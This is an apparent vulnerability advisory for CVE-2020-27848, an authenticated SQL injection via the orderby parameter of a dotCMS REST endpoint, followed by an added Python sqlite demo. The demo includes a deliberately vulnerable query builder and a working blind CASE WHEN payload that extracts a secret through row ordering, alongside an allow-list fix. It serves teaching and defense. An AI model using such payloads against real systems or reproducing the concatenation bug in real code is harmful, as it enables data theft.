
Xiaozhicaio

#29452 of 53,635
8.8 Total CVSS
Vulnerabilities · 1
PT-2020-16809
8.8
2020-12-30
Dotcms · Dotcms · CVE-2020-27848
**Name of the Vulnerable Software and Affected Versions**

dotCMS versions prior to 20.10.1

**Description**

The issue allows SQL injection, as demonstrated by the `/api/v1/containers` endpoint with the `orderby` parameter. The PaginatorOrdered classes used for paginating results of REST endpoints do not sanitize the `orderby` parameter, so its value reaches the ORDER BY clause of the query and makes it vulnerable to SQL injection in some cases. A user must be an authenticated manager in the dotCMS system to exploit this issue.

**Recommendations**

For versions prior to 20.10.1, update to version 20.10.1 or later to resolve the issue. As a temporary workaround, consider restricting access to the `/api/v1/containers` endpoint or validating the `orderby` parameter (for example, against an allow-list of known column names and sort directions) to reduce the risk of exploitation.
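The following is an added example, not code from the advisory or from dotCMS itself. It models the bug class described above in Python with an in-memory sqlite3 database: a constructed `containers` table and a hypothetical `user_` table holding a secret (both invented for the demonstration, not dotCMS's real schema). It shows why an unsanitized `orderby` value is exploitable even though it sits outside any quoted string, how the returned row order becomes a boolean oracle for blind extraction, and the allow-list fix, which is the right shape of remediation because ORDER BY identifiers cannot be passed as bind parameters.

```python
import sqlite3
import string

# Constructed sample data (example only; not dotCMS's real schema or data).
CONTAINERS = [("c1", "Header", 1), ("c2", "Footer", 2), ("c3", "Sidebar", 3)]
SECRET_ROW = ("admin", "hunter2")  # stands in for data an attacker would want to read

# Hypothetical allow-list for the hardened endpoint: only these tokens may appear in ORDER BY.
ALLOWED_COLUMNS = {"inode", "title", "sort_order"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def make_db():
    """Build an in-memory database with a containers table and a table holding a secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE containers (inode TEXT, title TEXT, sort_order INTEGER)")
    conn.executemany("INSERT INTO containers VALUES (?, ?, ?)", CONTAINERS)
    conn.execute("CREATE TABLE user_ (user_id TEXT, password TEXT)")
    conn.execute("INSERT INTO user_ VALUES (?, ?)", SECRET_ROW)
    return conn


def vulnerable_list(conn, orderby):
    """Bug class from the advisory: the caller-supplied orderby is concatenated into the SQL."""
    sql = "SELECT inode, title FROM containers ORDER BY " + orderby
    return conn.execute(sql).fetchall()


def blind_payload(guess):
    """orderby value that sorts by title when the guess is right and by sort_order otherwise.
    No quote needs to be broken out of: ORDER BY accepts any expression as-is."""
    return ("(CASE WHEN (SELECT substr(password, 1, 1) FROM user_) = '%s' "
            "THEN title ELSE sort_order END)" % guess)


def blind_first_char(conn):
    """Recover the first character of the secret using only the row ordering as the oracle."""
    title_order = vulnerable_list(conn, "title")
    for guess in string.ascii_lowercase + string.digits:
        if vulnerable_list(conn, blind_payload(guess)) == title_order:
            return guess
    return None


def safe_list(conn, orderby):
    """Hardened form: ORDER BY cannot take bind parameters, so validate the input against an
    allow-list of known column names and directions and rebuild the clause from those tokens."""
    parts = orderby.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("invalid orderby: %r" % orderby)
    column = parts[0].lower()
    direction = parts[1].lower() if len(parts) == 2 else "asc"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid orderby: %r" % orderby)
    sql = "SELECT inode, title FROM containers ORDER BY %s %s" % (column, direction.upper())
    return conn.execute(sql).fetchall()


def rejects(conn, orderby):
    """True if the hardened endpoint refuses this orderby value."""
    try:
        safe_list(conn, orderby)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legitimate ordering by title:", vulnerable_list(db, "title"))
    print("first char of secret leaked via ordering oracle:", blind_first_char(db))
    print("hardened endpoint accepts 'title desc':", safe_list(db, "title desc"))
    print("hardened endpoint rejects payload:", rejects(db, blind_payload("h")))
```

The `blind_first_char` loop is the attacker's side of the exercise: each request leaks one bit (which of two orderings came back), so the whole secret can be read one character at a time without any error message or direct output. The hardened path deliberately never echoes the caller's string into SQL; it maps the input onto known-good tokens and rejects everything else, which is the behaviour the advisory's workaround of "sanitizing" `orderby` should amount to.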